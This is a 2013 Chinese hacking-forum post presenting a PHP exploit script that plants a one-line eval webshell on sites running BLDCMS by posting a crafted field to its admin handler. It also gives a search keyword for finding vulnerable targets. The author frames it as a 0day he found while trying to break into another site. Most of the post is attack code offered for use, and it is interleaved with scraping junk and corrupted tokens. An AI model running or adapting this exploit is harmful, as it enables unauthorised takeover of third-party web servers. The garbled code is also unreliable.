中国网络渗透测试联盟

标题: BLDCMS(白老大小说) Getshell 0day EXP [打印本页]

作者: admin    时间: 2013-3-26 20:49
标题: BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞# p/ l. J( g5 U3 E1 p; B

; T$ p0 {3 N; T% b" S
- I  m3 y$ }$ a话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 5 }9 a8 f- I  s. a3 v- L. }
1 v% |0 ]$ m' |3 W' t) {) W6 N7 X" t
既然都有人发了 我就把我之前写好的EXP放出来吧
0 ~# [4 C! r7 v 1 d, @. p) q9 X. B( o% v+ V
view source print?01.php;">2 A2 [! c; M5 e! t
02.<!--?php; l+ |, j6 r' ?/ A1 o$ e2 r
03.echo "-------------------------------------------------------------------) F, X( a: L, W+ o  l; ^; s
04. 6 i( b, U7 i9 ?
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
( C# m: G* Z0 i: T+ |4 a9 i06.
3 s, k9 v5 Y( R' x07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun6 F' F' W3 p1 O& }+ Z, e- G
08.
: [* m2 F# r8 w% k09.QQ:981009941\r\n                                2013.3.21\r\n            
  ]3 P  ~- \. r' Y7 _10. + \8 x% t. F  ?; A' J8 O5 ~
11.
1 y4 E/ R! |4 \, b% S% N12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码" ]+ X% g0 g* N& D' @
13. 3 y+ }2 e: @* y3 T' Q8 g5 E% T3 U
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------, j. i% a3 T$ a# Z% M4 K2 t
15.
: v) d' j  v* G/ Z+ Y9 c8 \; @16.--------------------------------------------------------------------\r\n";% z. F. c( c% b2 i: q
17.$url=$argv[1];9 U. v2 W7 v* r* G# Q* _0 ^( V
18.$dir=$argv[2];* W6 Y0 t. H, ]+ U0 t4 Y: x$ ?# I
19.$pass=$argv[3];; `7 o  Y3 R; |; k' |/ @' G
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
3 c8 `- q7 h. N. h( l" s21.if (emptyempty($pass)||emptyempty($url))
6 c, _4 [) `' w7 ^' e22.{exit("请输入参数");}
* c: ]8 b- [1 J* b1 B" `$ C" u+ S23.else
2 c/ ~9 ~* B3 @" f24.{
2 u5 v7 N* j' Y4 P25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
) ?( s5 C( M: W: O, T. {  x5 v1 d26.
/ Y( O4 s: y# y  L; X! ]; k27.al;
6 b* K# {4 y' X+ [1 H% T28.$length = strlen($fuckdata);$ I: f, A; H9 v7 |. e
29.function getshell($url,$pass)
$ L# _) ]1 \, F8 B: l30.{" B% Y& t  J6 E. B/ U  z( C
31.global $url,$dir,$pass,$eval,$length,$fuckdata;# O4 u! \, N& B+ E' w8 O' Y
32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";5 h* C) U$ f. ~8 ^
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
# a% E: `$ F% J+ V% Y34.$header .= "User-Agent: MSIE\r\n";
! V6 E* t3 `' B9 `- }  [; a35.$header .= "Host:".$url."\r\n";
# U) k. }/ M. g* L36.$header .= "Content-Length: ".$length."\r\n";% ^( r& w2 J9 Q) g
37.$header .= "Connection: Close\r\n";
& s) A: K5 B* Y* u38.$header .="\r\n";& X& K* D; b2 }" X. U5 y' s
39.$header .= $fuckdata."\r\n\r\n";
7 T( a# M7 W2 l: \! [/ T2 C4 Z40.$fp = fsockopen($url, 80,$errno,$errstr,15);+ D/ b( S2 P  j2 }6 g! U
41.if (!$fp)' j0 I& u/ ]& F" `8 D
42.{
4 C# Z1 t- e7 ]/ @+ `! `& ~% S43.exit ("利用失败:请检查指定目标是否能正常打开");$ c4 Y2 I) P: ~  T5 o. @: g
44.}
* c5 @' L; _% R4 C! O; c* ?45.else{ if (!fputs($fp,$header))7 F* k$ X4 h; P/ E: x. x) `) B
46.{exit ("利用失败");}
1 [4 ~/ q1 O6 G$ A) Z# y47.else
& k5 |5 }: ~: c+ W( N  y, m: M/ [48.{& p" d! @( Q  |- N
49.$receive = '';# u! r9 }' @: V# O: ?0 Y8 a' B
50.while (!feof($fp)) {' w0 N+ P0 D. k/ J, J& @/ y2 h
51.$receive .= @fgets($fp, 1000);
3 s2 w0 q2 S, B1 \! D+ i  [' a! |52.}
: {9 H: k, ]+ E$ L$ ]2 r53.@fclose($fp);$ Y4 b2 \/ e. @; T) |7 J
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标) H  _* C& }7 Z% v4 |9 p
55. + x7 l1 x& Z: W
56.GPC是否=off)";* L8 G/ F% Y$ a
57.}}
& R8 ]. P2 N/ N  t* ]+ Q# U58.}
2 R  j5 G, ~& l+ ~; R2 I59.}7 [- m0 i+ Z& `( z
60.getshell($url,$pass);8 T" z- G" L, c$ a. p7 c
61.?-->8 f& z& ^- u2 G1 q! T7 a1 S2 l4 D: u
& H0 k" f. H7 i, I6 S/ Y
. a, G$ p( H2 W+ b9 z
% C  G& G1 _+ s9 `. I
by 数据流+ s5 r$ {  a  c( L: b4 u: v" U





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2